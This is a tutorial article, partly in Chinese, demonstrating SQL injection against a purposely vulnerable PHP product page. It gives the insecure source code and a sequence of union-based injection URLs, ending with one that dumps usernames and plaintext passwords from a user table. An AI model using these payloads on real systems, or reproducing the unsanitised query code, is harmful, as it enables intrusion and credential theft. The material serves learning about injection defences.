A complete process of SQL injection in PHP

The content of this article is a complete process of SQL injection in PHP. Now I share it with everyone. Friends in need can refer to it.

After learning some skills of SQL injection, the following is Simple practice of SQL injection into PHP MYSQL

First observe two MYSQL data tables

User record table:

REATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

## Product record list:

CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default '',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');

The following file is show_product.php used to display the product list. SQL injection also exploits the SQL statement vulnerability of this file

<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "数据库联接错误";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "选择数据库出错" . mysql_error();
exit;
}
$tempID=$_GET[&#39;id&#39;];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.&#39;<br>&#39;;
$result = mysql_query($sql);
if (!$result) {
echo "查询出错" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "没有查询结果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo &#39;ID:&#39;.$row["id"].&#39;<br>&#39;;
echo &#39;name:&#39;.$row["name"].&#39;<br>&#39;;
echo &#39;price:&#39;.$row["price"].&#39;<br>&#39;;
echo &#39;image:&#39;.$row["img"].&#39;<br>&#39;;
}
?>

##Observe this statement: $sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID is obtained from $_GET. We can construct the value of this variable to achieve the purpose of SQL injection

Construct the following links respectively:

1,

http://localhost/phpsql/index.php?id=1

Get the following output

SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句

//Get the product information list with ID 1

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

2、 http://localhost/phpsql/index.php?id=1 or 1=1

得到输出

SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句

//一共两条产品资料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:2

name:name_2

price:35.25

image:images/name_2.jpg

1和2都得到资料列表输出，证明SQL语句执行成功

3、判断数据表字段数量

http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

得到输出

SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句

//一共两条记录，注意第二条的记录为全1，这是union select联合查询的结果。

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:1

name:1

price:1

image:1

4、判断数据表字段类型

http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

得到输出

SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:0

name:A

price:0

image:A

注意第二条记录，如果后面的值等于A，说明这个字段与union查询后面构造的字段类型相符。此时union后面

为char(65)，表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型

5、大功告成，得到我们想要的东西：

http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

得到输出：

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

##//Output two user information, name is the user name , image is the user password.

ID:1

name:seven

price:1

image:seven_pwd

ID:1

name:swons

price:1

image:swons_pwd

Note that the ID=10000 in the URL is to not get the product information, only to get the following union query results. In more practical situations, the value of the ID is different.

The username and password of the union must be placed in positions 2 and 4. Only in this way can it match the previous select statement. This is the characteristic of the union query

statement

Remarks:

This is a simple injection method is more context-specific. In reality it's more complicated than this. But the principle is the same.

related suggestion:

Data security method for PHP to prevent SQL injection

Example of method for PHP to prevent SQL injection

The above is the detailed content of A complete process of SQL injection in PHP. For more information, please follow other related articles on the PHP Chinese website!